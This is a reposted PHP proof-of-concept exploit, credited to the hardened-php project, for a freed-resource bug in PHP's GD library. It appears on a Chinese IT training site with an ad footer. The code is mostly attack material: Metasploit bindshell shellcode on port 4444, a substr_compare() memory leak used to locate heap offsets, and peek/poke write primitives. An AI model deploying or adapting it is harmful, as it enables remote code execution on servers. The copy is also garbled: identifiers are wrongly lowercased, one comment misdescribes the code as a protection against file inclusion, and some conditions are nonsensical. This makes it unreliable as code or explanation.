php x01 x00 x01,PHP

// _ _ _ _ ___ _ _ ___ //

// | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \ //

// | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/ //

// |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_| //

// //

// proof of concept code from the hardened-php project //

// (c) copyright 2007 stefan esser //

// //

// php gd already freed resource usage exploit //

// this is meant as a protection against remote file inclusion.

die("remove this line");

// linux x86 bindshell on port 4444 from metasploit

$shellcode = "\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x46".

"\x32\x3c\xe5\x83\xeb\xfc\xe2\xf4\x77\xe9\x6f\xa6\x15\x58\x3e\x8f".

"\x20\x6a\xa5\x6c\xa7\xff\xbc\x73\x05\x60\x5a\x8d\x57\x6e\x5a\xb6".

"\xcf\xd3\x56\x83\x1e\x62\x6d\xb3\xcf\xd3\xf1\x65\xf6\x54\xed\x06".

"\x8b\xb2\x6e\xb7\x10\x71\xb5\x04\xf6\x54\xf1\x65\xd5\x58\x3e\xbc".

"\xf6\x0d\xf1\x65\x0f\x4b\xc5\x55\x4d\x60\x54\xca\x69\x41\x54\x8d".

"\x69\x50\x55\x8b\xcf\xd1\x6e\xb6\xcf\xd3\xf1\x65";

// offsets used for the overwrite (will be overwritten by findoffsets()

$offset_1 = 0x55555555;

$offset_2 = 0x66666666;

findoffsets(); // comment out if you want to just test the crash

class dummyclass { }

function myerrorhandler()

{

imagedestroy($globals['img']);

// clipping

$globals['x'] = str_repeat(chr(0), 7311);

$globals['x'][7310] = chr(0x00);

$globals['x'][7309] = chr(0x01);

$globals['x'][7308] = chr(0x00);

$globals['x'][7307] = chr(0x7f);

$globals['x'][7306] = chr(0xff);

$globals['x'][7305] = chr(0xff);

$globals['x'][7304] = chr(0xff);

$globals['x'][7303] = chr(0);

$globals['x'][7302] = chr(0);

$globals['x'][7301] = chr(0);

$globals['x'][7300] = chr(0);

$globals['x'][7299] = chr(0x80);

$globals['x'][7298] = chr(0);

$globals['x'][7297] = chr(0);

$globals['x'][7296] = chr(0);

// true color image

$globals['x'][0x1c38] = chr(1);

// true color pixelmap (1st entry must be 0)

$globals['x'][0x1c3c] = chr(0x08);

$globals['x'][0x1c3d] = chr(0x80);

$globals['x'][0x1c3e] = chr(0x04);

$globals['x'][0x1c3f] = chr(0x08);

return true;

}

function poke($addr, $value)

{

$globals['img'] = imagecreate(1, 1);

imagesetpixel($globals['img'], $addr >> 2, new dummyclass(), $value);

}

function peek($addr)

{

$globals['img'] = imagecreate(1, 1);

return imagecolorat($globals['img'], $addr >> 2, new dummyclass());

}

printf("using offsets %08x and %08x\n", $offset_1, $offset_2);

error_reporting(e_all);

set_error_handler("myerrorhandler");

poke($offset_2, $offset_1);

unset($d);

// this function uses the substr_compare() vulnerability

// to get the offsets.

function findoffsets()

{

global $offset_1, $offset_2, $shellcode;

// we need to not clear these variables,

// otherwise the heap is too segmented

global $memdump, $d, $arr;

$sizeofhashtable = 39;

$maxlong = 0x7fffffff;

// signature of a big endian hashtable of size 256 with 1 element

$search = "\x00\x01\x00\x00\xff\x00\x00\x00\x01\x00\x00\x00";

$memdump = str_repeat("a", 18192);

for ($i=0; $i<400; $i++) {

$d[$i]=array();

}

unset($d[350]);

$x = str_repeat("\x01", $sizeofhashtable);

unset($d[351]);

unset($d[352]);

$arr = array();

for ($i=0; $i<129; $i++) { $arr[$i] = 1; }

$arr[$shellcode] = 1;

for ($i=0; $i<129; $i++) { unset($arr[$i]); }

// if the libc memcmp leaks the information use it

// otherwise we only get a case insensitive memdump

$b = substr_compare(chr(65),chr(0),0,1,false) != 65;

for ($i=0; $i<18192; $i++) {

$y = substr_compare($x, chr(0), $i+1, $maxlong, $b);

$y = substr_compare($x, chr(1), $i+1, $maxlong, $b);

if ($y-$y == 1 || $y-$y==1){

$y = chr($y);

if ($b && strtoupper($y)!=$y) {

if (substr_compare($x, $y, $i+1, $maxlong, false)==-1) {

$y = strtoupper($y);

}

}

$memdump[$i] = $y;

} else {

$y = substr_compare($x, chr(1), $i+1, $maxlong, $b);

$y = substr_compare($x, chr(2), $i+1, $maxlong, $b);

if ($y-$y != 1 && $y-$y!=1){

$memdump[$i] = chr(1);

} else {

$memdump[$i] = chr(0);

}

}

}

// search shellcode and hashtable and calculate memory address

$pos_shellcode = strpos($memdump, $shellcode);

$pos_hashtable = strpos($memdump, $search);

if ($pos_shellcode == 0 || $pos_hashtable == 0) {

die ("unable to find offsets");

}

$addr = substr($memdump, $pos_hashtable+6*4, 4);

$addr = unpack("l", $addr);

// fill in both offsets

$offset_1 = $addr[1] + 32;

$offset_2 = $offset_1 - $pos_shellcode + $pos_hashtable + 8*4;

}

?>

小编推荐：欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术，请 点击这里注册账号，公开课频道价值万元IT培训教程免费学，让您少走弯路、事半功倍，好工作升职加薪！

免责声明：本站系公益性非盈利IT技术普及网，本文由投稿者转载自互联网的公开文章，文末均已注明出处，其内容和图片版权归原网站或作者所有，文中所述不代表本站观点，若有无意侵权或转载不当之处请从网站右下角联系我们处理，谢谢合作！